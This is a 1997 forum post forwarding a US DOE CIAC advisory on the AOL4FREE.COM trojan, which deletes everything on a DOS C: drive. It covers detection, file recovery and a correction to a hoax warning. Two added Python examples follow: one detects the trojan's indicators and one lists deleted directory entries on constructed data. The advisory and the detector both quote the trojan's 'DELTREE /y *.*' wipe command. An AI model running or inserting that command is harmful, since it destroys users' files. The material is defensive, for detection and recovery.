Fw: AOL4FREE Virus

Lo King Sang Eddy
04-18-1997, 12:52 PM
> From: Joe Odenweller
> Subject: FW: AOL4FREE Virus
> Date: Saturday, April 19, 1997 AM 08:07
> Thought some here may find this interesting...
> Lots of Forwarding Info Deleted...
> __________________________________________________________
> The U.S. Department of Energy
> Computer Incident Advisory Capability
> __________________________________________________________
> AOL4FREE.COM Trojan Horse Program Destroys Hard Drives
> April 16, 1997 18:00 GMT Number H-47
> __________________________________________________________
> PROBLEM: A Trojan Horse program called AOL4FREE.COM that deletes
> files on a hard drive is circulating the Internet.
> PLATFORM: DOS/Windows-based PCs
> DAMAGE: When the AOL4FREE.COM program is executed, all files and
> directories on the user's C: drive are deleted.
> SOLUTION: DO NOT execute this program. If the program starts executing,
> quickly pressing Ctrl-C will save some of your files.
> __________________________________________________________
> VULNERABILITY ASSESSMENT: Users who download the trojaned AOL4FREE.COM
> program and execute it will destroy all the files and directories on
> their DOS C: drive.
> __________________________________________________________
> CIAC has obtained a Trojaned copy of AOL4FREE.COM that destroys hard
> drives.
> CIAC has obtained a Trojaned copy of the AOL4FREE.COM program that, if
> deletes all the files on a user's hard drive. If you are e-mailed this
> file, or if you have downloaded it from an online service, do not attempt
> to it.
> If the program was received as an attachment to an e-mail message, do not
> double click (open) it. Opening an attached program runs that program,
> which in this case deletes all the files on your hard drive. The original
> AOL4FREE.COM was a program for fraudulently creating free AOL (America
> Online) accounts. Note that any attempt to use the original AOL4FREE.COM
> program may subject you to prosecution.
> NOTE: Most antivirus programs will not detect this or other Trojan Horse
> programs.
> Detection
> =========
> AOL4FREE.COM is a Trojan program that is 993 bytes (2 sectors) long.
> It masquerades as the AOL4FREE program that allows the fraudulent of
> free AOL accounts. The following text is readable in the AOL4FREE.COM
> if you display it with the DOS TYPE command or the DOS EDIT program.
> Compiled by BAT2EXEC 1.5
> PC Magazine . Douglas Boling
> Note that this text may appear in any program compiled with the BAT2EXEC
> program and has nothing to do with the Trojan Horse.
> If you open the AOL4FREE.COM file with a disk editor or with the Windows
> Notepad program, the following text is found at the end of the second
> sector of the file.
> /C C:
> /C CD\
> DELTREE /y *.*
> Where F*** is a common vulgar expletive.
> Recovery
> ========
> Pressing Ctrl-C before the Trojan Horse finishes deleting all your files
> will save some of them. If the program runs to completion, all the files
> on your root drive will have been deleted. The files are deleted with the
> DOS DELTREE command, so the contents of the files are still on your hard
> disk, only the directory entries have been deleted. Any program that can
> recover deleted files will allow you to recover some or all of the files
> on your hard disk.
> While attempting to recover files, be sure to not write any new files
> the hard disk as the new files may overwrite the contents of a deleted
> file, making it impossible to recover. You will probably have to boot your
> with a floppy and run any recovery programs from there.
> If you happen to have one of the delete tracking programs installed on
> system (a program that keeps track of deleted files in case you want them
> back) the recovery operation will be relatively simple. Follow the
> directions in your delete tracking program to recover your files. If not,
> you will probably have to recover each file individually, supplying the
> first character of the file name, which is overwritten in the directory
> when the file is deleted. Most DOS/Windows disk tools programs also have
> the capability recovering deleted files so follow the directions included
> with those programs to do so.
> Background
> ==========
> The original AOL4FREE.COM program was developed to fraudulently create
> AOL accounts. The creator of that program has pleaded guilty to
> America Online for distributing that program. Anyone else attempting to
> that program to defraud AOL could also be prosecuted.
> An e-mail message was recently circulating about the Internet that warned
> of an AOL4FREE virus, but that warning is either a hoax or a badly
> misunderstood description of this Trojan Horse.
> 1. This program is a Trojan Horse, not a virus. It does not spread on
>    own.
> 2. A Trojan Horse must be run to do any damage.
> 3. Reading an e-mail message with the Trojan Horse program as an
>    attachment will not run the Trojan Horse and will not do any damage.
>    Note that opening an attached program from within an e-mail reader
>    runs that attached program, which may make it appear that reading the
>    caused the damage. Users should keep in mind that any file with a
>    or .EXE extension is a program, not a document and that double clicking
>    opening that program will run it.
> CIAC still affirms that reading an e-mail message, even one with an
> attached program, can not do damage to a system. The attachment must be
> both downloaded onto the system and run to do any damage.
> CIAC, the Computer Incident Advisory Capability, is the computer
> security incident response team for the U.S. Department of Energy
> (DOE) and the emergency backup response team for the National
> Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
> National Laboratory in Livermore, California. CIAC is also a founding
> member of FIRST, the Forum of Incident Response and Security Teams, a
> global organization established to foster cooperation and coordination
> among computer security teams worldwide.
> CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
> can be contacted at:
> Voice: +1 510-422-8193
> FAX: +1 510-423-8002
> STU-III: +1 510-423-2604
> E-mail: ciac@llnl.gov
> For emergencies and off-hour assistance, DOE, DOE contractor sites,
> and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
> 8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
> or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
> Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
> duty person, and the secondary PIN number, 8550074 is for the CIAC
> Project Leader.
> Previous CIAC notices, anti-virus software, and other information are
> available from the CIAC Computer Security Archive.
> World Wide Web: http://ciac.llnl.gov/
> Anonymous FTP: ciac.llnl.gov (
> Modem access: +1 (510) 423-4753 (28.8K baud)
> +1 (510) 423-3331 (28.8K baud)
> CIAC has several self-subscribing mailing lists for electronic
> publications:
> 1. CIAC-BULLETIN for Advisories, highest priority - time critical
> information and Bulletins, important computer security information;
> 2. CIAC-NOTES for Notes, a collection of computer security articles;
> 3. SPI-ANNOUNCE for official news about Security Profile Inspector
> (SPI) software updates, new features, distribution and
> availability;
> 4. SPI-NOTES, for discussion of problems and solutions regarding the
> use of SPI products.
> Our mailing lists are managed by a public domain software package
> called Majordomo, which ignores E-mail header subject lines. To
> subscribe (add yourself) to one of our mailing lists, send the
> following request as the E-mail message body, substituting
> ciac-bulletin, ciac-notes, spi-announce OR spi-notes for list-name:
> E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
> subscribe list-name
> e.g., subscribe ciac-notes
> You will receive an acknowledgment email immediately with a confirmation
> that you will need to mail back to the addresses above, as per the
> instructions in the email. This is a partial protection to make sure
> you are really the one who asked to be signed up for the list in
> If you include the word 'help' in the body of an email to the above
> address, it will also send back an information file on how to
> get past issues of CIAC bulletins via email, etc.
> PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
> communities receive CIAC bulletins. If you are not part of these
> communities, please contact your agency's response team to report
> incidents. Your agency's team will coordinate with CIAC. The Forum of
> Incident Response and Security Teams (FIRST) is a world-wide
> organization. A list of FIRST member organizations and their
> constituencies can be obtained via WWW at http://www.first.org/.
> This document was prepared as an account of work sponsored by an
> agency of the United States Government. Neither the United States
> Government nor the University of California nor any of their
> employees, makes any warranty, express or implied, or assumes any
> legal liability or responsibility for the accuracy, completeness, or
> usefulness of any information, apparatus, product, or process
> disclosed, or represents that its use would not infringe privately
> owned rights. Reference herein to any specific commercial products,
> process, or service by trade name, trademark, manufacturer, or
> otherwise, does not necessarily constitute or imply its endorsement,
> recommendation or favoring by the United States Government or the
> University of California. The views and opinions of authors expressed
> herein do not necessarily state or reflect those of the United States
> Government or the University of California, and shall not be used for
> advertising or product endorsement purposes.
> LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
> H-36: Solaris 2.x CDE sdtcm_convert Vulnerability
> H-37: Solaris 2.x passwd buffer Overrun Vulnerability
> H-38A: Internet Explorer 3.x Vulnerabilities
> H-39: SGI IRIX fsdump Vulnerability
> H-40: DIGITAL Security Vulnerabilities (DoP, delta-time)
> H-41: Solaris 2.x eject Buffer Overrun Vulnerability
> H-42: HP MPE/iX with ICMP Echo Request (ping) Vulnerability
> H-44: Solaris 2.x fdformat Buffer Overflow Vulnerability
> H-45: Windows NT SAM permission Vulnerability
> H-46: Vulnerability in IMAP and POP
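The Detection section of the advisory gives three static indicators: a 993-byte file, the BAT2EXEC banner (which the advisory says appears in any BAT2EXEC output), and the drive-wipe command text at the end of the second sector. The following triage routine is an added example, not CIAC's code or part of the forwarded message; the function name, verdict labels and both sample buffers are constructed for illustration, and the check generalizes slightly by ignoring the file name.

```python
"""Static triage for the indicators in the CIAC H-47 Detection section."""

BANNER = b"Compiled by BAT2EXEC 1.5"   # appears in any BAT2EXEC output
PAYLOAD = [b"/C C:", b"/C CD\\", b"DELTREE /y *.*"]  # text quoted in the advisory
ADVISORY_SIZE = 993                    # bytes, per the advisory
SECTOR = 512


def triage(name: str, data: bytes) -> dict:
    """Report which advisory indicators a file matches; never executes it."""
    upper = data.upper()
    offsets = [upper.find(p.upper()) for p in PAYLOAD]
    in_order = all(o >= 0 for o in offsets) and offsets == sorted(offsets)
    result = {
        "name_match": name.upper() == "AOL4FREE.COM",
        "size_match": len(data) == ADVISORY_SIZE,
        "bat2exec": BANNER.upper() in upper,
        "payload": in_order,
        # advisory: the commands sit at the end of the second sector
        "payload_in_sector_2": in_order and SECTOR <= offsets[0] < 2 * SECTOR,
    }
    # The banner alone is benign; the delete sequence is what matters,
    # whatever the file happens to be called.
    if result["payload"]:
        result["verdict"] = "destructive-batch"
    elif result["bat2exec"]:
        result["verdict"] = "bat2exec-only"
    else:
        result["verdict"] = "no-match"
    return result


def _constructed_sample(tail: bytes, size: int = ADVISORY_SIZE) -> bytes:
    """Build a padded buffer for the demo (constructed, not the real file)."""
    body = BANNER + b"\r\nPC Magazine . Douglas Boling\r\n"
    return body + b"\x00" * (size - len(body) - len(tail)) + tail


# Constructed inputs: one carries the command text, one is a harmless batch.
SUSPECT = _constructed_sample(b"/C C:\x00/C CD\\\x00DELTREE /y *.*\x00")
BENIGN = _constructed_sample(b"/C ECHO hello\x00", size=700)

if __name__ == "__main__":
    for label, blob in (("FREE.COM", SUSPECT), ("HELLO.COM", BENIGN)):
        print(label, triage(label, blob))
```

The renamed sample is still flagged because the verdict keys on the command sequence, while the BAT2EXEC banner by itself only yields `bat2exec-only`.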
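The Recovery section says only the directory entries are deleted and that the first character of each file name is overwritten. The sketch below is an added example, not from CIAC or the forwarded message: it assumes the standard 32-byte FAT12/16 directory entry layout and the 0xE5 deletion marker (neither is stated in the advisory), and the directory bytes it scans are constructed.

```python
import struct

ENTRY_SIZE = 32
DELETED = 0xE5   # first name byte of a deleted FAT entry (assumed layout)
END = 0x00       # first name byte of a never-used entry: end of directory


def list_deleted(directory: bytes) -> list:
    """Return deleted 8.3 entries found in raw FAT12/16 directory bytes."""
    found = []
    for off in range(0, len(directory) - ENTRY_SIZE + 1, ENTRY_SIZE):
        entry = directory[off:off + ENTRY_SIZE]
        if entry[0] == END:
            break
        attr = entry[11]
        if entry[0] != DELETED or attr == 0x0F:   # 0x0F = long-name slot
            continue
        # The original first character is gone; show it as '?'.
        base = "?" + entry[1:8].decode("ascii", "replace").rstrip()
        ext = entry[8:11].decode("ascii", "replace").rstrip()
        # Start cluster and size survive deletion, which is what lets an
        # undelete tool find the data as long as nothing overwrote it.
        cluster, size = struct.unpack_from("<HI", entry, 26)
        found.append({
            "name": base + ("." + ext if ext else ""),
            "is_dir": bool(attr & 0x10),
            "first_cluster": cluster,
            "size": size,
        })
    return found


def _entry(name83: bytes, attr: int, cluster: int, size: int,
           deleted: bool) -> bytes:
    """Build one directory entry for the demo (constructed sample data)."""
    raw = bytearray(name83.ljust(11)) + bytes([attr]) + bytes(14)
    raw += struct.pack("<HI", cluster, size)
    if deleted:
        raw[0] = DELETED
    return bytes(raw)


# Constructed root directory: one live file, one deleted file, one deleted
# subdirectory, then the end-of-directory marker.
SAMPLE_DIR = (
    _entry(b"COMMAND COM", 0x20, 2, 54645, deleted=False)
    + _entry(b"REPORT  DOC", 0x20, 30, 12288, deleted=True)
    + _entry(b"GAMES      ", 0x10, 55, 0, deleted=True)
    + bytes(ENTRY_SIZE)
)

if __name__ == "__main__":
    for item in list_deleted(SAMPLE_DIR):
        print(item)
```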